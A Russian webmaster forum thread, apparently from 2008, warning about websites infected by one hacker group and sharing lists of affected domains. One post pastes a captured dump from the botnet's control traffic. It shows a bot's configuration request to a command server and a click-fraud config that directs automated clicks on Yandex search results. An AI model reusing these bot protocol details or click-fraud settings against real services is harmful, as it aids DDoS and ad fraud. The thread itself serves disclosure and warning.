Форум Сайтостроение Хостинг

Списки сайтов которые ломали несколько известных персонажей.

K
На сайте с 24.03.2004
Offline
223
kostich
801

Подробности вот тут > http://forum.nag.ru/forum/index.php?showtopic=44613

ps. Если кто что знакомое видит, то предупредите владельцев или хостинг.

проверенная ддос защита (http://ddos-protection.ru) -> http://ddos-protection.ru (http://ddos-protection.ru), бесплатный тест, цена от размера атаки не зависит.
[Удален]
#1

У меня не загрузилось :(

[Удален]
#2

Дайте рабочую ссылку

K
На сайте с 24.03.2004
Offline
223
kostich
#3

ну давайте тут.

ниже вырезка из дампа управлялки досилки и кликера... список хостов зараженных доменов ща солью. 


POST /www7/www/getcfg.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

User-Agent: _TEST_

Host: cxim.inattack.ru

Content-Length: 63

Pragma: no-cache



getp=syn&id=xUSER-63ABFAB7D8_A0799E1D&ln=ru&cn=RU&nt=2600&bid=1



GET /cfg/ios_uni.php?994699066 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: xkirill.org

Connection: Keep-Alive





HTTP/1.1 200 OK

Date: Tue, 02 Sep 2008 10:52:50 GMT

Server: Apache/1.3.39 (Unix) PHP/5.2.5

X-Powered-By: PHP/5.2.5

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



1a3

.

[fid]

url=http://philos.ifindit.ru/search.php



find1=search.php?r

find2=click.php?hash

before=http://www.yandex.ru/yandsearch?text=%CE%E1%FA%FF%F1%ED%E5%ED%E8%E5&lr=163

[refs]

referal1=http://www.yandex.ru/yandsearch?text=%CE%E1%FA%FF%F1%ED%E5%ED%E8%E5&lr=163

[clicks]

howlongtowaitforclick=88000

howlongtowaitforclickrandomrange=890

howmanyclicksmin=3

howmanyclicksmax=4

timetoclick=39



[options]

isclicking=true 



0

ps. поясните плиз тайный смысл кликанья по страницам яшки с переходом на этот http://philos.ifindit.ru/search.php? какая там партнерка дальше этот левый траф скупает?

K
На сайте с 24.03.2004
Offline
223
kostich
#4

В атаче зипованный список доменов с хронологией их заражения (точнее в порядке обнаружения)... на каких-то доменах уже чисто, какие-то еще раздают. На всех домены инжекты одной хакерской групы 1traff.cn-7traff.cn, managerss.cn и еще там пара их доменов... мы не ставили целью вывалить всё целиком и полностью... в репорте более чем достаточно - виртуальный терроризм в чистом виде. Русские это хакеры или не русские нам без разницы... в рунете гигантская туча зараженных этой ПРОДАЖНОЙ бригадой сайтов и только им известно со скольки десятков тысяч компьютеров и сколько гигабайт персональной информации они выгребли и куда они её слили.

PS. В момент начинания топика на форуме nag.ru с каких-то сайтов компьюетры заражались ddos ботом флудящим клиента MCHOST и кликером, который бегал по яндаксу и чего-то кликал.

zip report.zip
AA
На сайте с 21.12.2007
Offline
89
Artpsiholog Artalexa
#5

Возможно кому-то пригодится...

В аттаче спиок, вычищенный от дат и времени, т. е. только сайты.

txt report.txt
Заметки админа. (https://sysadmin.pm/) | Заметки в Telegram. (https://t.me/sysadminnotes)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий